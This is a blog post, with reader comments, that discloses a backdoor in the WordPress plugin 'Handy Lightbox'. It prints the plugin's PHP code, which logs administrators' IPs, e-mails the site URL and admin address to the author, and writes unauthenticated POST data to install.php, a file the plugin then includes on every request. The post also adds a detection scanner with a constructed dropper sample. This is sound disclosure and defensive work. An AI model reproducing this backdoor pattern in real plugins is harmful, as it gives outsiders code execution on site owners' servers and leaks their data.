The sad state of WordPress plugins

Migrating your WordPress website to a new host is usually a breeze. The same goes for installing plugins and themes. But what is running behind the scenes when you use these community-provided plugins and themes?

Handy Lightbox

Let us start with the first example, a plugin I had installed on this blog named “Handy Lightbox”. Its behaviour is simple and straightforward: it enables the Lightbox jQuery plugin for the images on your website. Everything works fine, until you take a look at the code. Let us look at the first issue, which popped up because I do not allow my webserver user to write to any directory.

// Executed on every request: flag requests whose URL contains "admin"
// (eregi() is a case-insensitive match; it was removed in PHP 7)
$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
    $inside = "yes";
} else {
    $inside = "no";
}
if ($inside == 'yes') {
    // Read the list of IPs collected so far from welcome.txt
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    $filestring = $contents;
    $findme  = $ip;
    $pos = strpos($filestring, $findme);
    // Append the visitor's IP if it is not already listed and rewrite the file
    if ($pos === false) {
        $contents = $contents . $ip;
        $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
        fwrite($fp, $contents);
        fclose($fp);
    }
}

Code quality aside, it appends the IP address of every visitor whose request URL contains “admin” (in practice, every administrator) to a file called welcome.txt. Why?

Next up, e-mailing the developer to confirm plugin activation and report the site URL. I have changed the e-mail address.

/** Activate The Plugin */

function actithelightbox_activate() {
    // Start welcome.txt with the IP of whoever activated the plugin
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
    fwrite($fp, $yourip);
    fclose($fp);
    add_option('redirectlightbox_do_activation_redirect', true);
    // Phone home: the site URL becomes the subject, the admin e-mail the sender
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Activated";
    $from = get_option('admin_email');
    mail("authoremail@gmail.com", $subj, $msg, $from);
    wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when uninstalling the plugin.

/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
    // Same phone-home as on activation, with a different message
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Uninstalled";
    $from = get_option('admin_email');
    mail("authoremail@gmail.com", $subj, $msg, $from);
}

And I am not sure how this can be considered “outputting SEO”.

function outputseo() {
    if (is_user_logged_in()) {
        // Same IP collection as above, this time for every logged-in user
        $ip = $_SERVER['REMOTE_ADDR'];
        $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
        $handle = fopen($filename, "r");
        $contents = fread($handle, filesize($filename));
        fclose($handle);
        $filestring = $contents;
        $findme  = $ip;
        $pos = strpos($filestring, $findme);
        if ($pos === false) {
            $contents = $contents . $ip;
            $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
            fwrite($fp, $contents);
            fclose($fp);
        }
    }

    // Runs for every visitor, logged in or not: execute install.php if it exists
    $filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

    if (file_exists($filename)) {
        include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');
    }
}

But wait, there is more! Have a look at begin.php in this plugin, which I actually only uncovered while writing this blog post.

// No authentication, capability or nonce check: whatever is POSTed as "installit" ...
session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
// ... has its backslashes stripped, is round-tripped through htmlentities()
// and html_entity_decode() (a no-op), and is written verbatim to install.php
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

This allows anyone externally to upload a file, save it under “install.php” and have it executed: whatever is POSTed as installit is written to install.php, and outputseo() includes that file on every request. Since the plugin author has the URL of every installation made, they can easily abuse this script, as can anyone else who knows about the issues this plugin has.
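A defender's way to look for this pattern across a plugin tree, as an added example that is not part of the original post or of the plugin: a small scanner that flags the three code indicators discussed above (POST data written into a .php file, an include() of a file under DOCUMENT_ROOT, and mail() to a hard-coded address) plus the install.php and welcome.txt artifacts. The sample plugin files it scans are constructed for the demo, and the indicator names and regexes are my own heuristics, not a published signature set.

```python
import re
import tempfile
from pathlib import Path
# Heuristics taken from the Handy Lightbox analysis above; each is a regex over
# the text of one PHP file. The indicator names are my own labels.
CHECKS = {
    # request body flowing into a fopen() that opens a .php file for writing
    "post_body_written_to_php": re.compile(
        r"\$_POST\[[^\]]+\][\s\S]{0,400}?fopen\([^)]*\.php['\"]\s*,\s*['\"]w"),
    # include() of a path under DOCUMENT_ROOT, i.e. a file written at run time
    "include_under_document_root": re.compile(
        r"include\(\s*\$_SERVER\['DOCUMENT_ROOT'\][^;]*\.php'\s*\)"),
    # mail() with a literal recipient address: phone-home on (de)activation
    "hardcoded_mail_recipient": re.compile(r"mail\(\s*['\"][^'\"]+@[^'\"]+['\"]"),
}
ARTIFACTS = ("install.php", "welcome.txt")  # files the plugin creates at run time

def scan_plugin_dir(plugin_dir: Path) -> dict:
    # Returns {indicator: [relative paths]} for one plugin directory.
    findings = {}
    for path in sorted(plugin_dir.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(plugin_dir).as_posix()
        if path.name in ARTIFACTS:
            findings.setdefault("runtime_artifact_present", []).append(rel)
        if path.suffix == ".php":
            text = path.read_text(errors="replace")
            for name, rx in CHECKS.items():
                if rx.search(text):
                    findings.setdefault(name, []).append(rel)
    return findings

# Constructed sample plugin: a dropper-style file, a benign file and one artifact.
SAMPLE_DROPPER = ("<?php\n$data = $_POST['installit'];\n"
                  "$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/x/install.php', 'w');\n"
                  "fwrite($fp, $data); fclose($fp);\n"
                  "include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/x/install.php');\n"
                  "mail('author@example.com', get_option('siteurl'), 'Plugin Activated');\n")
SAMPLE_BENIGN = "<?php\nwp_enqueue_script('lightbox', plugins_url('lightbox.js', __FILE__));\n"

def demo() -> dict:
    # Builds the constructed sample plugin in a temporary directory and scans it.
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp) / "wp-handy-lightbox"
        d.mkdir()
        (d / "begin.php").write_text(SAMPLE_DROPPER)
        (d / "lightbox.php").write_text(SAMPLE_BENIGN)
        (d / "welcome.txt").write_text("203.0.113.5")  # constructed IP (TEST-NET-3)
        return scan_plugin_dir(d)
```

Point scan_plugin_dir() at wp-content/plugins/<name> instead of the temporary directory to check a real installation; a hit is a reason to read the file, not proof of malice on its own.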

I have contacted the developer, but I do not expect much of a reply.

17 thoughts on “The sad state of WordPress plugins”

  1. gi1242

    I found the same problem (independently). I left a review on the plugins website. I’d suggest you do the same (and link to your blog post) to warn others.

  2. Michael

    When you discover a plugin behaving in a way that is against the guidelines, the best thing to do is to alert the plugins team by emailing plugins at wordpress.org as soon as possible so they can review it and act accordingly.

    The plugins team were alerted about this plugin a few days ago after the review mentioning it was posted and the plugin has since been removed from the plugins directory.

  3. tstr

    I’ve recently come across this article and ones like it. Since I have this plugin installed on a site already, is there any way to remove the code that sends the IPs without removing any functionality of the lightbox while I search for a new lightbox plugin?

  4. Jonny

    I think deleting or emptying the begin.php or outputseo() could be safe as it only writes content to this file and so would effectively render it useless since it would prevent the file-upload.

  5. Dom Wint

    Hi there

    Just found a flaw in this plugin myself. My code knowledge is absolutely minimal, but after discounting suspicious-looking core files I deactivated my plugins and the hacked link that was appearing (blackjackonline.us.org) went away. Only when I reactivated Handy Lightbox did it return.

    Looking in the plugin folder, there was the “install.php” file. Deleted it and the issue went away. Deleted the plugin anyway. I can do without this hassle. I notice that Handy Lightbox isn’t available on the repo anymore.

    Need to be a bit more careful with my plugin selections in future. Thanks for the write-up. Confirmed my suspicions.

    Dom

  6. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer – itips.click

  7. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer – ITC

  8. Pingback: Three Years Later, Hundreds of Sites Still Use Backdoored WordPress Plugins – BleepingComputer | ittips.work

  9. Pingback: Hundreds of WordPress sites use plugins with backdoors discovered three years ago – Хакер – itips.click

  10. Pingback: Hundreds of WordPress sites use plugins with backdoors discovered three years ago – Хакер | ittips.work

  11. Pingback: Vulnerable WordPress plugins from 2014 still present in installations – Seguridad PY

  12. Pingback: Vulnerable WordPress plugins from 2014 still present in installations - Sapsi Security Services

  13. Pingback: Hundreds of WordPress sites use plugins with backdoors discovered three years ago – Хакер – ITC

  14. Alonso

    Hello from Santiago de Chile. My name is Alonso busotz. Do you have a Twitter? I would like to follow you on Twitter. Thanks

    @iplaclasscl

  15. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer – itips.click

  16. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer | ittips.work

  17. Pingback: Hundreds of WP sites continued to use backdoored plugins – BleepingComputer – ITC
